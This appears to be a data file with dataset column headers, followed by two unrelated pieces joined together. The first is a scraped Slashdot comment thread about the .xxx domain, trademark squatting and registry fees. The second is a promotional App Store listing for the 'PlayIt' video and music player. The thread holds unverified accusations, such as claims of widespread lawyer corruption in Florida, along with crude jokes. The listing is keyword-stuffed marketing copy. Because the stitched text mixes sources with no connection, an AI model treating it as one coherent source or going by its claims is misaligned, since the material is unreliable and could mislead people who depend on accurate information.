text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
?" Welcome to capitalism (Score:2, Insightful) We hope you enjoy your stay. Re:Welcome to capitalism (Score:5, Interesting) No, it's more like, "Welcome to Florida". The level of corruption in this state is unbelievable. Lawyers mismanaging senior citizen trust funds is rampant in Florida, and there's absolutely nothing that family members can do about it. Any time a lawyer gets a hold of a senior citizens' funds because that person is incapacitated, the lawyer immediately makes up all kinds of bogus legal fees and charges them to the person's account, draining their funds in a matter of months. It's impossible to file a Bar complaint, because that will cause the lawyers to sue the complainant, and the Bar tells that to anyone who calls them to file a complaint about an attorney. This kind of corruption is nothing new in the USA, but it's raised to an absurd level in Florida. Apparently, a lot of people are so mad about it that they're going to stage an event where they fly planes with banners protesting the state of affairs over the county court houses all across the state, at the same time. Re:Welcome to capitalism (Score:5, Interesting). Re: (Score:3). Plenty of lawyers would sue their own children or parents if there was any chance of getting money out of it, I don't think they'd balk at diddling a fellow shark. Gerber.xxx? (Score:5, Funny) Re: (Score:2, Insightful) Re: (Score:2) Not nearly enough money there to offset the loss of business from social conservatives boycotting Gerber. Which is why the lawsuit damage amount will be staggering. Same with disney.xxx. These companies can bring millions of dollars in legal muscle to bear when it comes to protecting their names and IP. Just the 'goodwill' & defamation of company character amounts will be huge. In other news (Score:4, Insightful) Re: (Score:3) Re: (Score:3) The problem with that is it favours companies with lots of money and IT staff who can keep on top of it. It isn't just generic TLDs they have to worry about, there are all the country TLDs too. There is no good solution. Companies will always want to buy every variation of their name. The best we can do is ensure that name-is-stupid.com is protected if registered by an individual, but at the moment it all depends on the local trademark laws. It is worse for non-US companies because the supposedly generic TLD Re: (Score:2) So, clearly, what we need here is a .stupid TLD. Then we can get all the stupid companies to take .stupid domain names, and the clever ones can stay as they are. That should work exactly as well as the .xxx TLD is going to work. Of course it all falls apart if someone is clever enough to take the "is-stupid" suffix and register it under .xxx, or indeed .stupid. No publicity is bad publicity (Score:2) After all, what maker of baby food or children's movies, for example, would want to have sites such as gerber.xxx or disney.xxx floating around the Internet? They could spin it advantageously in the end...somehow. Re: (Score:2) By making it a porn site themselves, ala PETA and reap the profits. After all it promotes ... baby nutrition. Re: (Score:2) PETA was not well-looked-on by the courts. Imagine how this company will be considered. His is this any different from other TLDs? (Score:5, Insightful) I don't see how this is any different than worryabout trademark registrations for .edu, .net, .org, or the country code TLDs. If you really want to protect your trademark, you have to register an awful lot of TLDs just to cover one variation on a name. Fortunately the convention seems to be that whoever registers for a .com, first implicily has the rights to that name in other .TLDs. Re:His is this any different from other TLDs? (Score:5, Insightful) Re: (Score:2) Re: (Score:3) >>Just a pure shakedown. If only the ICANN had done a request for comments from the public, maybe these problems could have been identified in advance. Oh, wait, they did. It was a terrible idea then, and a terrible idea now, which got rejected repeatedly, until a bunch of money got dangled in front of their face. Re:His is this any different from other TLDs? (Score:5, Insightful) It's similar in a way, and they already have been trying to push that (all the registrars nag, sometimes insistently, about registering variants). At first glance this raises the stakes by putting forth the possibility of someone not only squatting on a variant of your name, but an "unsavory" version of it. disney.info is squatting, but disney.xxx maybe would damage the brand. Like if there were a .felon domain name and someone registered your full name dot felon or something. On the other hand, it's long been possible to convert a non-offensive domain name into an offensive domain-squat by just putting up unsavory content on the domain, like in the ol' whitehouse.gov/whitehouse.com thing. Re: (Score:3) Re:His is this any different from other TLDs? (Score:5, Interesting). Re:His is this any different from other TLDs? (Score:5, Insightful) Easy answer. A domain squatter is someone who owns a domain and doesn't have nearly as much money as the person who wants it. Re:His is this any different from other TLDs? (Score:5, Insightful) Exactly. Remember mikerowesoft.com? The guy's name was Mike Rowe, and he had a software company. He had every right to that domain name and company name, but Microsoft forced him to give it up. Re: (Score:2) I like you. This is my point as well. Maybe I slept that day in marketing class, but how does the public really distinguish the brand trust between disney.xxx and disneyxxx.com? It's going to take a while before the average joe thinks "whatever.xxx" is actually a website. Google is going to be doing most of the work for the first year, as people search "whatever xxx" and end up at ://whatever.xxx/ first click.. You win devil's advocate points, but are still morally bankrupt. ;) The idea of a "legitimate porno Re: (Score:2) Re: (Score:3) Fortunately the convention seems to be that whoever registers for a .com, first implicily has the rights to that name in other Also fortunately, very few people would actually care if gerber.xxx was a porn site. For a long time whitehouse.com was a porn site. Was good for a laugh, but it wasn't like people were outraged thinking that Bush or Clinton or whoever was in the office at the time was filming all those lesbo scenes. How many people are going to type in gerber.xxx, get porn or viruses, and stop buying baby food? Re: (Score:2) Re: (Score:2) The porn site would be a LIE! I didn't get hot lesbian sex... I got BABIES... now those Gerber folks got me for the next 3+ years. It's some kind of ensnarement to get more business. (although Gerber should go after the 65+ crowd..it's bigger than the under 5 club. Gotta gum day food.) Re: (Score:3) its no different, just an extension of the same scam. I still remember when the top level names actually meant something.. ( and i think was enforced, or at least it seemed to be back then ) Someone like Microsoft wouldn't be allowed to register a .org, or .net.. Now its a free for all, and forcing companies to take preemptive steps and forking out the cash. ( for a large company its not a lot of cash, but its still wrong.. and for a smaller company it can add up. ) The entire name system is a total disaster Re: (Score:2) Re: (Score:3) If you really want to protect your trademark, you have to register an awful lot of TLDs just to cover one variation on a name. That's really a silly approach to trying to protect your trademark -- even with the top-level domains currently out there, there are just too many variations. Why is disney.xxx a big deal when they haven't registered disneyxxx.com or disney-xxx.com? If disney.xxx pops up, then Disney can file a UDRP complaint or a civil suit and get the domain taken down pretty quickly. Fortunately the convention seems to be that whoever registers for a .com, first implicily has the rights to that name in other .TLDs. That is certainly not true. Registering the .com does not give you rights to any others. Its already agaisnt the law (Score:2) Re: (Score:2, Interesting) against the law where ? there are 192 countries on this planet Re: (Score:2) Why would Disney.xxx be against the law? No child is accidentally going to go to Disney.xxx when they think they're going to Disney.com. They're going to have a little link on their bookmark bar to Disney.com. They would have to actually try if they wanted to get to Disney.xxx. And further, there's no possibility that a porn site would ever get confused with Disney, the children's programming company. No confusion, no trademark infringement. About the only thing that might make it dubious is the "famo Re: (Score:2) ...I question that trademarks are as strong as you think they are. If the registry for .xxx is based in Florida (the same state as several major Disney parks), I guarantee you that their trademark is much, much stronger than you think it is. Re: (Score:2) Not necessarily. By including .xxx in the domain, they are explicitly (pun intended) conveying that they are NOT a site for children. Further, they are making it quite simple for a responsible parent to block their child's access to their content. If the domain was picturesofdisney.com and "Disney" turned out to be a stripper, you'd have a point. This has already been discussed (Score:3, Informative) Re:This has already been discussed (Score:5, Insightful) A couple hundred bucks so something bad does not happen to you (wink wink) is a shakedown, regardless of how much money the shakee has. Re:This has already been discussed (Score:5, Insightful)". Re: (Score:2) There is no renewal. The $200 fee (if your application is approved) results in a permanent, irrevocable, blacklist of that name. Even YOU cannot use the .xxx name if you successfully get it blacklisted. Re: (Score:2) While that's marginally than having to renew every year, it's still a $200 fee (plus accounting costs and the time to file the paperwork) that they don't have to pay now. And they'll face the same issue with each new gTLD. Still looks a lot like a protection racket. And taking it permanently out of use might make sense for some brands/trademarks, but for others, that could be a problem. If the company who owns a trademark goes out of business, or stops using it and eventually stops renewing the trademark whe Re: (Score:2)". The solution is arbitrary, non-exclusive, TLDs. If there is a (potentially) infinite number of TLDs then these land-grabs and protection rackets become impossible. Just like how, the .com namespace right now, you cannot defensively buy every variation of insult couple with your brand. You might grab mybrand-sucks.com, and boycott-mybrand.com, but you miss mybrands-mother-was-a-hamster.com and all the rest. You wait and reactively fight these kinds of things with court injunctions when they become troublesome Re: (Score:2) Re: (Score:2) Ok, ill give you that on the huge companies out there, but what about a mom and pop shop that barley makes a living selling their home made widgets? Why should they have to defend themselves, in effect? $200 for .xxx $200 for .net, info, biz, bla bla bla.... ( and the time spent maintaining it all ) It does add up after a while. Never forget who OWNS the Washington Times. (Score:2) That paper is about as serious as the Daily News. Submissions linking to it have no place here. Re: (Score:2) All publications should be submitted here. Regardless of who "owns" a paper or not. Leave it to the reader, and commenters on the forums to decide. Not your narrow view of what people should decide. Re:Never forget who OWNS the Washington Times. (Score:4, Informative) I don't know when people started taking the stance that all opinions and all sources should be given equal time and weight, but it has led to a massively uninformed populace. Re: (Score:2) I don't know when people decided that refusing to run a story based on who owns a news paper was a good way to do things. You know they did that just before germany turned into nazi germany too. That turned out well. Re: (Score:2) Nice to see Godwin is alive and well. Re: (Score:2) Nice to see Godwin is alive and well. Is he living in Argentina? Re: (Score:2) [wikipedia.org] Re: (Score:2) Well, it certainly is better when one group gets to decide what is "informative", right? Gerber? (Score:2) gerber are obviously just typosquatting gerbil.xxx, a domain which I expect to retail for plenty. Worst of both worlds? (Score:4, Insightful). Exorbitant registration fees will make it so this will never serve its intended purpose- most smut will be hosted on normal tlds just to save on fees. And the claimed "shakedown" racket makes no sense. If there's going to be porn which (ab)uses your trademark, it's not like registering a domain will wipe it out or even make it significantly harder to find. The best route for normal businesses would be to just ignore everything under that tld. It's not like the old whitehouse.com problem- if somebody says "I went to gerber.xxx and was SHOCKED to see what was there! For shame!" there's the easy rejoinder "What exactly were you doing looking up gerber.xxx, and what did you expect to find on an .xxx domain? Why would you think that's affiliated with us at all?" But this greedy registry wants to wring extra dough out of people by playing on their trademark paranoias. Re:Worst of both worlds? (Score:5, Informative). The trouble is that it can't work that way. You can't exclude all smut to a single set of domains for a large number of reasons. For one thing, nobody really agrees on a definition. For another, any single domain may contain a wide variety of things: You can find a metric ton of non-smut on tumblr, but you can also find plenty of naked women there too. And you basically end up with two choices: Either you banish all of those websites in their entirety to .xxx and then all of their non-smut content ends up behind the filter (and you hit First Amendment problems in the US), or you let websites containing smut use non-.xxx domains, but then the filter doesn't actually block the smut because nobody uses exclusively .xxx when they can reach a larger audience by paying another $8/year to get the equivalent .com domain. The problem is really with filtering in general, not with domains: You have a trade-off between false negatives and false positives. The only way to have a low number of false negatives is to have a high number of false positives and vice versa. And we decided a long time ago that it's better for government to accept the large number of false negatives and then let people choose for themselves what content they want to consume, than to have a government censorship board that decides what people can see and hear. Re: (Score:2) Isnt this a rather good place for TXT records? img.tumbler.com TXT contains:unfiltered-images,usercontent Worked for SPF, and would certainly get the job done easily. Let sites classify themselves, and have registrars enforce it. As for first amendment rights, as long as it is not being legislated or pushed into place by the government, what your employer filters is not a violation of your rights at all. Re: (Score:2) Isnt this a rather good place for TXT records? img.tumbler.com TXT contains:unfiltered-images,usercontent The trouble is that the tags don't tell you enough. Every website in the world has user content these days. If you block anything that approximately means "unmoderated user content" then you block everything from Slashdot to vendors' tech support forums to Google web search. But if you don't then you let through all the "explicit" content posted by users. As for first amendment rights, as long as it is not being legislated or pushed into place by the government, what your employer filters is not a violation of your rights at all. The only way the smut peddlers would actually register their content as smut is if the law required it; they know it means their site will be blocked and t Re: (Score:2) The disagreement about the definition of smut is exaggerated: just about everybody "knows it when they see it," to quote Judge Stewart, for the vast majority of cases. To pretend there's vast disagreement about it is just disingenuous. Sure, there's a bit of disagreement at the margins, and of course saying that a whole domain has to move to .xxx because of a pornographic image or two would be ludicrous. But I'm not talking about implementing a zero-false-negatives filter, especially not at a government leve Re: (Score:2) The disagreement about the definition of smut is exaggerated: just about everybody "knows it when they see it," to quote Judge Stewart, for the vast majority of cases. To pretend there's vast disagreement about it is just disingenuous. The problem, as always, is that "knows it when they see it" is not a meaningful legal test. Is a picture of a topless girl smut? What about a video showing two people having sex, but without showing any nudity? What if the same scene is three minutes long out of a 60 minute drama? What if it's three minutes out of 60, but the sex scene does show nudity? What if there is no sex or nudity at all, but a scene shows a woman striking another woman with a whip and presents the implication that she takes pleasure Re: (Score:2) ...But this greedy registry wants to wring extra dough out of people by playing on their trademark paranoias. But if I don't register my-trademark.xxx, then it could be claimed in court that I wasn't protecting my trademark, and thus it should be vacated... :( You know, I started this post off as a joke, but unfortunately, I suspect that someone could actually succeed at this claim... FSM, we need better trademark laws... :( Re:Worst of both worlds? (Score:4, Insightful) Re: (Score:2) Re: (Score:2) Re: (Score:2) I agree about Facebook belonging there! Streisand Effect (Score:2) I continue to wonder whether any greedy porn king would have the slightest interest in "gerber" or "disney". If they had found a market in that, we'd already have Gerber_XXX.com or XDisney (like Xhamster). The brew-ha-ha may actually create a "Streisand Effect" causing domain squatters to go register domains they otherwise would not have considered (something I tried labelling the "streisand.xxx effect"). "The Streisand effect is a primarily online phenomenon in which an attempt to hide or remove a piece Re: (Score:2) Which makes me also wonder... what's the big problem here? In the article, the only people complaining are the smut site operators because they don't like the idea of shelling out more of their "hard" - earned money on protecting their brands. As for other businesses, they really don't seem to have anything to worry about. If every Joe's Widgets Inc. had to worry about every TLD, they'd have to register over a hundred of them. Most people use a search engine to find what they're looking for. When they DO kno simple domain registration rules? (Score:3) ICANN should make a few simple rules (i.e. easy to understand and to code). Good examples could be {domain}.com OR {domain}.xxx, but not both {domain}.TLD (original list) OR {domain}.(arbitrary TLD), but not both. These could be used to filter out online registrations. Obviously some sort of exceptions will crop up (playboy.com and playboy.xxx), which could be handled by certifying that the owner of the first registration is filing for the second. Registrars could charge extra for this manual red-tape exception. The whole TLD industry is a scam anyway (Score:2) Fifteen years ago, .org, .net and .com made sense and by and large companies registered the domain that made sense for their business. Then businesses decided that letting someone else own, say, cocacola.net didn't make a lot of sense from a branding point of view. (Which is entirely true; the domain system was devised with little thought given to commercial interests or how they'd likely play out). Today, most businesses of any size can be counted on to register every TLD that is even remotely well-known - i Re: (Score:2) Re: (Score:2) Wow, they did it! (Score:2) I have a lot of "smut" like domains. I would say, I own about 50 non-variant domain names; non-variant bob.com and bobby.com count as one. Maybe a solid 35 of those are no doubt fine domains for a smut site. All for personal use, because I'm a geek and feel I ought to own my own domains, I do not make money from them or anything, I don't even check the mail going to many of them so even if someone wanted to buy one for millions I never saw the offer, nor do I want to see such an offer honestly. To me, i what is all the fuss about (Score:2) Re: (Score:2) Are you sure you actually know anybody? Re: (Score:3) I truly doubt that none of your acquaintances or any of their acquaintances watches porn. It's not as if not knowing they watch it means no one does it. Do you have some sort of neighborhood porn investigation network in which you and your buddies talk about their abstinence from porn or something? Enforcement? (Score:2) They rarely enforce the intended uses of the existing TLDs. Did you really think .xxx would be any different? Re: (Score:2) They rarely enforce the intended uses of the existing TLDs. I guess you haven't tried to get a .bank or .aero domain name. Re: (Score:3) Keyword is rarely. Some TLDs are enforced. mil, edu, etc No surprise (Score:2) Anyone who is surprised by this has simply not been paying attention. confusion (Score:2) Hey, Gerber does not get to monopolize the name! (Score:5, Interesting) Gerber means "to vomit" in french. Since .xxx is not language specific and vomit has a small but very dedicated and well-paying porn following (really, it does), I have every right to register that name and use it to sell vomit-porn to the francophone market. As long as I am not using the name in a way that would lead to trademark confusion (which would be pretty hard to argue), Gerber should just butt out. Re: (Score:2) Re: (Score:2) Except other, more reputable, agencies handling domains always give trademark holders and current domain holders first dubs on names before allowing others in. It seems they are already to the "bidding" stage with no mechanism to allow current rights holders to protect their rights... The registrar should be sued outright for not putting methods in place every other registrar agreed to after years of lawsuits. Re: (Score:2) the concept of 'vomit-porn' is not only new to me, but horizon-widening in every sense ... No, the horizon-widening porn is called scat. Don't google it! Re:Hey, Gerber does not get to monopolize the name (Score:4, Funny) Alt.sex.watersports never involved synchronized swimming, either. -- BMO Re: (Score:2) You haven't heard of '2 girls 1 cup' ? Re:Disney.xxx ? isnt there already such a site ? (Score:5, Insightful) Re: (Score:3) Not to mention power over copyright. Re: (Score:2) as a parent, i'm going to be watching what my kid watches. and try to limit the amount of TV they watch in the first place. if you let TV raise your kids, then you reap what you sow. and Disney's nowhere near as bad as most of the shit that gets broadcast. i may backflip when my kid gets old enough to nag me for stuff. Hollywood Records (Score:2) I figure that Disney's Hollywood Records subsidiary is a problem, any issues with the message of classic Disney cartoons nonwithstanding. Hollywood Records is responsible for especially crappy pop music (Miley Cyrus, Hillary Duff, the Jonas Brothers) that pushes an eerily clean-cut image Re: (Score:2) Re: (Score:2) Hmmm... lessee... Server not found Firefox can't find the server at. Apparently not... yet. Re: (Score:2) I'm not an animal-rights activist, but to say that animals have no feelings and do not feel pain? There is quite a bit of scientific evidence for that, and little against it, at least when it comes to mammals. Whether they feel it the exactly the same as we do is irrelevant. You need to brush up a bit. Re: (Score:3) Anyone who thinks animals don't have feelings or the ability to perceive pain either haven't spent enough time with animals, are terrified of them, or have autism. Seriously. Have you never stepped on a cat's tail? Not only will it react in pain - much as a human would if you stepped on them - it will likely hold it against you. Dogs are practically ruled by their emotions. In fact, us humans borrow their reactions to describe emotions - one who is beaten walks away with their tail between their legs. My bu Re: (Score:2) it's impossible to know another person's pain, let alone another being. it's just a call that no real scientist is willing to make on anything that has the capacity to react at all to it's environment. T-800: "I sense injuries. The data could be called pain." Re: (Score:2) Re: (Score:2) 31 minutes since my last comment? I hope I am not overwhelming the infrastructure here! The Slashdot administrators are just doing their part to cure those who suffer from Premature Edification. Considering your career (Score:2) 31 minutes since my last comment? I hope I am not overwhelming the infrastructure here! How often do you use this line? :) -Matt Re: (Score:2) Probably because you have a brand new account. Post for a little while, and the restriction should go away. Standard restriction is about 30 seconds or so, and that's just to prevent a lot of "me too!" posts. Re: (Score:2) Five minutes, actually. Re: (Score:2) The closest thing I've ever seen to American hentai is Marge Simpson in Playboy. Not to besmirch Heavy Metal, Ralph Bakshi, and Robert Crumb (bless 'em as pioneers), but we're doing it wrong... Polish Playboy did a CGI photo spread of the women of the Witcher. They looked real in a born-airbrushed sort of way.
http://tech.slashdot.org/story/11/09/05/2014224/Porn-Industry-Outsiders-Fear-Shakedown-In-XXX-TLD
CC-MAIN-2014-10
refinedweb
4,703
74.29
Wed, Mar 2, 2011 at 8:46 AM, Yuri D'Elia <wavexx@...> wrote: > > > > On Wed, 2 Mar 2011 22:01:02 +0900 > Jae-Joon Lee <lee.j.joon@...> wrote: > > > >> > Is this a bug? > > >> > > >> Unfortunately, bbox_inches option is never meant to be complete in > > >> figuring out the exact size of the figure area. > > > > > > Why not? What's the purpose of bbox_inches='tight' otherwise? > > > > Figuring out enclosing bbox when arbitrary spline paths are involved > > is difficult (I think there is no exact solution). So I only intended > > to support common cases. > > Ok, I can understand that, but shouldn't all artists used to construct the > picture, as suptitle, be considered? > > > >> However, you can use "bbox_extra_artists" keyword argument to specify > > >> additional artists that should be considered when dertermining the > > >> plot size. > > >> > > >> mytitle = fig.suptitle("Horray!", fontsize=20) > > >> > > >> ... > > >> > > >> fig.savefig("out.png", bbox_inches='tight', > bbox_extra_artists=[mytitle]) > > > > > > That doesn't work for me either. > > > > Can you be more specific? Does it throw an exception? Or the code runs > > without any error but the output is still wrong? > > No error/exception are produced. The output is simply identical to the one > without bbox_extra_artists. > > This also works in my previous example: > > import matplotlib as mpl > import matplotlib.figure > import matplotlib.backends.backend_agg > > fig = mpl.figure.Figure() > cvs = mpl.backends.backend_agg.FigureCanvasAgg(fig) > fig.set_size_inches((20,20)) > plot = fig.add_subplot(111) > plot.set_title("Subtitle") > plot.plot([1,2,3], [3,2,1]) > st = fig.suptitle("Horray!", fontsize=20) > fig.savefig("out.png", bbox_inches='tight', bbox_extra_artists=[st]) > > Which version of matplotlib are you using? This example works for me using the latest matplotlib from source. Also, why the awkward usage and imports? If you want to force the Agg backend to be used, you could just do: import matplotlib matplotlib.use("Agg") before any other matplotlib imports. Ben Root On Thu, Mar 3, 2011 at 9:54 PM, George Washington <gws293@...>wrote: > I am new to Matplotlib and am having some problems plotting the following > set of coordinates (in python 2.6 and Win 7 32) > This is just a small sample of the data: > > Seq.No. x-scale y-scale z-scale > 01.000000 1579446.055280 5361974.495490 1342.967407 > 02.000000 1579446.646620 5361972.813700 1342.967407 > 03.000000 1579448.047050 5361968.830880 1341.237305 > 04.000000 1579450.992084 5361963.830880 1337.739502 > 05.000000 1579453.937117 5361958.830880 1336.262817 > ... > ... > > with the following outcome: > (plot3d.png) > > *Problem*: while the x-scale is ok and the z-scale looks ok, the y-scale > is definitely not ok. The numbers in the image are *not* the ones in the > y-array (I double checked.) > George, This is a known issue where very large axis values were being represented using an "offset" (much like in 2-d plots with very large axis values). The problem was that the offset was not displayed for 3d plots. This is definitely fixed in the latest development branch, but I can't remember if I fixed it in the 1.0.1 release (probably not). > > I also have a number of questons: > *Question1*: how does one create a label for the z scale? (zlabel is not > valid) > This should be fixed by the next release. Most functions like set_xlim(), set_ylabel() and such merely call that function for the appropriate axis object. If a particular function is missing, you can call it yourself doing something like the following: ax.zaxis.set_label() Note that if you have an earlier version of matplotlib, you might have to do: ax.w_zaxis.set_label() > *Queston2*: Is it possible to fill below the line (so it looks like a > mountain) and how > Never tried considered anything like that. Might involve creating a 3D patch object with some sort of path completion. File a feature request on the matplotlib tracker here: > *Question3*: Is it possible to traverse sequentially all the points > plotted in the image so as to make computations (such as distance to the > next point, etc..). > The points themselves come from a text file but are not > in sequence. They are sequenced by being plotted in their right position in > 3D space. > > I am not exactly sure what you mean, but there is a nice data structure that I use to do efficient data operations on spatial data called KDTrees, which can be found in scipy: I hope that is helpful. Ben Root Thank you for the reply. I discovered this myself yesterday. Now I have an official answer if people want a colored + or the x symbol in the scatter plot. Scott Hansen efiring wrote: > >. >> >> > > > ------------------------------------------------------------------------------ > What You Don't Know About Data Connectivity CAN Hurt You > This paper provides an overview of data connectivity, details > its effect on application quality, and explores various alternative > solutions. > _______________________________________________ > Matplotlib-users mailing list > Matplotlib-users@... > > > -- View this message in context: Sent from the matplotlib - users mailing list archive at Nabble.com.. > > On 03/01/2011 10:22 PM, Jason Grout wrote: > I tried building the standalone html docs using: > > cd doc > python make.py html > > I notice that there are around 30 .pyc files left in the > build/html/pyplots/ directory. Are these needed in the html > documentation build directory? > No -- but they are also a little hard to avoid. I have made a change to clean these out after the fact. > Also, it seems that the files in _images are redundant, as they are > referenced in their original directory, not _images. > > from the build/html directory: > > % find . -name multiline.pdf > ./_images/multiline.pdf > ./plot_directive/mpl_examples/pylab_examples/multiline.pdf > % grep -ri "multiline.pdf" * > examples/pylab_examples/multiline.html:<p>[<a class="reference external" >source > code</a>,<a class="reference external" >hires.png</a>, > <a class="reference external" >pdf</a>]</p> > This one is harder. Sphinx annoyingly always copies every image that is displayed on a page to the _images directory. However, it is impossible to link (i.e. through an <a href="...">) to an image in the _images directory. Since our plot directive results need to both display the image and link to different resolutions of them, we have to at least have two copies of the "normal resolution" pngs, unless we can solve the problem in Sphinx itself or do some sort of postprocessing on the HTML output. However, the .pdf files ending up in _images is the result of the peculiar way in which HTML and LaTeX are generated from the same source. Sphinx seems to think it is displaying both png and pdf images in the HTML and copies them both over. I have added a post-processing step to our build that subsequently removes the pdf files under _images. You can see the changes here: Mike > Any comments about trimming down the size of the build/html directory? > > Thanks, > > Jason > > ------------------------------------------------------------------------------ >. > _______________________________________________ > Matplotlib-users mailing list > Matplotlib-users@... > > -- Michael Droettboom Science Software Branch Space Telescope Science Institute Baltimore,
https://sourceforge.net/p/matplotlib/mailman/matplotlib-users/?viewmonth=201103&viewday=4
CC-MAIN-2017-22
refinedweb
1,139
66.64
Adding Test target to an existing project in Xcode February 16, 2016 I had a project, for which it was time to add Unit Tests. Since the project was originally created without any test target, I thought that it is going to be a piece of cake. I had never been so wrong before. In the end I spent 6 hours battling with errors that I was getting due to Cocoapods dependencies, but I finally made it work. So here is a simple step-to-step guide that I think will be very useful for people who are going the same path. Adding Test bundle itself First of all just add new Target via File > New > Target... and select iOS Unit Testing Bundle. Done. In case you mix Swift with Objective-C To make everything work together, you need Bridging-Header.h file, which you very likely had already created. But to make it work with Test Bundle you need to make this one extra step, otherwise you will get funny errors: Go to Test Budle target in your Project > MyAppNameTests > Build Settings > Objective-C Bridging Header and paste the same stuff you did in your main app target. In case you use Cocoapods Next I had Cocoapods and it was giving me a hard time, but luckily I found a way to calm it down - you need to edit your link_with 'MyAppNameTests' The way Cocoapods works you have to prove this line, which tells that you want to link Pods framework with your Test Bundle target as well, to get access to all those pods you have in there. Otherwise it just won't work. Configuring Test Bundle Now since we are done configuring our Cocoapods and Bridging Header, we need to actually configure the test bundle itself. All you need to do is: - Click the Build Settings tab and set the Bundle Loader setting to this: $(BUILT_PRODUCTS_DIR)/MyExistingApp.app/MyExistingApp - Set the Test Host build setting to this: $(BUNDLE_LOADER) - Go back to app target (not the test target) and set the Symbols Hidden by Default build setting to this: NO Access to your classes from the Test target Now since Swift 2 we have a super easy way to get access to all your classes and structs and other stuff with new import XCTest @testable import MyAppName final class MyFirstTest: XCTestCase { override func setUp() { super.setUp() } override func tearDown() { super.tearDown() } func testExample() { } } Aaaaaand you are done and you have just saved yourself couple of hours of your precious life.
http://arsenkin.com/Adding-Test-target-to-an-existing-project-in-Xcode.html
CC-MAIN-2021-21
refinedweb
422
63.93
A tooltip is a textbox that appears while your cursor hovers over an element in an application and is useful for displaying additional information that a user may need. Tippy.js is a lightweight, easy-to-use library that provides tooltip solutions, as well as other pop-out style GUI tools. Tippyjs-react is a component of the Tippy library that allows developers to integrate tooltips, popovers, dropdown menus, and other elements in React projects. This tutorial will show you how to create and position tooltips in a React project using Tippy. Prerequisites First, make sure you install React 16.8+, Node.js, and either npm or Yarn before getting started. To make the most out of this guide, we recommend that you have some familiarity with: - JavaScript - HTML - React - Programming concepts like functions, objects, arrays, and classes Getting started Install tippyjs-react by running one of the following commands from the command line: npm i @tippyjs/react //OR yarn add @tippyjs/react Open or create a React project with a class and the elements you want to add Tippy tooltips to. For this tutorial, we’ll use a newsletter request form as an example. Specifically, we’ll focus on adding a tooltip to the form’s Submit button. Adding a Tippy tooltip to a React project Import the Tippy component and core CSS with the following commands: import Tippy from '@tippyjs/react'; import 'tippy.js/dist/tippy.css'; The tippy.css import statement is optional. It will make the tooltip look polished with little to no additional effort. This is called “Default Tippy.” If you’d rather create and style your own Tippy elements, or “tippies,” from scratch, you can import and use Headless Tippy instead of tippy.css: import Tippy from '@tippyjs/react/headless'; Here, we will use Default Tippy with tippy.css to create and position a Tippy React tooltip. After importing the Tippy component, insert a Tippy wrapper around the element you want to add a tooltip to: <Tippy content="We'll never share your email with anyone else."> <Button variant="outline-success" >Submit</Button> </Tippy> These commands will display a Submit button. Whenever a cursor hovers over the button, a tooltip will appear with the text, “We’ll never share your email with anyone else.” Positioning a Tippy React tooltip So far, we have not specified where we want to place the Tippy React tooltip relative to our Submit button. When tooltip placement is not specified, Tippy automatically positions them above elements. If an element is at the top of the page and doesn’t have space above it, Tippy will automatically place the tooltip below the element. Our current code will display a page element whose tooltip appears above it. Tippy’s default tooltip placement isn’t always ideal. In most cases, it’s necessary to specify placement to prevent tooltips from covering up important page elements. Tippy makes it easy to reposition tooltips in a React project. Placement options include: - Top - Bottom - Left - Right In our example, we want an unobstructed view of the Email field, so let’s move the tooltip to the right of the button element: <Tippy placement='right' content="We'll never share your email with anyone else."> <Button variant="outline-success" >Submit</Button> </Tippy> It’s possible to put multiple tippies on a single element by nesting Tippy commands: <Tippy placement='top' content="Top Tooltip"> <Tippy placement='bottom' content="Bottom Tooltip"> <Button variant="outline-success" >Submit</Button> </Tippy> </Tippy> These commands will insert a tooltip that says “Top Tooltip” above the associated element and another tooltip that says “Bottom Tooltip” below the same element. When inserting multiple Tippy wrappers on a single element, be sure to specify different tooltip placements — otherwise, one tooltip will cover all the others for that element. Other tips and tricks for Tippy tooltips in React You can add HTML blocks inside Tippy commands to change and stylize the tooltip. For instance, we can add a span tag to change a tooltip’s text color to orange: <Tippy placement='right' content={<span style={{color: 'orange'}}>Orange</span>}> <Button variant="outline-success" >Submit</Button> </Tippy> To remove the little arrow on the edge of the tooltip that points to the element, set the arrow attribute to false: <Tippy placement='right' arrow={false} <Button variant="outline-success" >Submit</Button> </Tippy> You can also add a delay attribute to the Tippy wrapper, creating a time delay between when the cursor hovers over an element and when the tooltip appears. The delay is measured in milliseconds, so setting the delay attribute to 1000 would lead to a one-second delay. <Tippy placement='right' delay={1000} <Button variant="outline-success" >Submit</Button> </Tippy> Conclusion Now you’ve learned the basics of how to create and position Tippy tooltips in a React project, including how to use Tippy’s placement attribute to position a tooltip around an element. You can also add HTML, remove the tooltip’s arrow, or add a time delay in order to customize your tooltips. The project and written code used in this tutorial can be found on GitHub. The complete project used the react-bootstrap framework and react-dom-router module, but these are not required for the information contained strictly in this article. Additional resources To learn more about using Tippy.js with React, check out these excellent_6<< >>IMAGE “Positioning a tooltip in React using Tippy” Thank you for this article. small remark: could you replace HTML in article for more familiar: JSX or a tree of React elements What’s accessibility like with this? Will an on-screen reader trigger the tooltip nicely?
https://blog.logrocket.com/positioning-a-tooltip-in-react-using-tippy/
CC-MAIN-2021-04
refinedweb
940
50.16
PlayIt need of an all-in-one video player, music player PlayIt - All-in-One Player What is it about? PlayIt need of an all-in-one video player, music player. App Screenshots App Store Description PlayIt need of an all-in-one video player, music player. PLAYit is ready to provide you a feast for eyes and ears! Immediate search all music and audio files, Easy to support all music & audio file formats, Custom background skin. PLAYit is made to help million of music lovers can reach millions of high-quality videos. PlayIt Music Player is the best app to play online videos and share it as mp3 Play it Video Player is the best music player for iPhone. With all formats supported and simple UI on PlayIt, Music Player provides the best musical experience for you. Browse all songs on iPhone device. you deserve to get this perfect offline music player for free now! Video to mp3 converter will provide you to convert any video to mp3 file not m4a file, And this is the only app which can convert video to mp3 file. you can convert any video to mp using PlayIt. Key features of PlayIt: • All in-one audio video player • Browse and play your music by Albums, Artists, Playlists, Genres, Folders, etc • Combine Audio, Video, Online Music, Converted Mp3 and Imported video into single Playlist • Beautiful Lockscreen controls with full-screen album art support (enable/disable) • Import Audio and video from other device using web share option • Folder support - Play song by folder • Wearable support • HD Video Player: Play It • Floting point video player • Easy navigation & Minimalistic design • All format videos all format audio supported • HD sax video player for all format: 4k videos, 1080p videos, MKV videos, FLV videos, 3GP videos, M4V videos, TS videos, MPG videos • Playing queue with reorder - Easily add tracks & drag up/down to sort • Powerful search - search quickly by songs, artist, album, etc • Party Shuffle 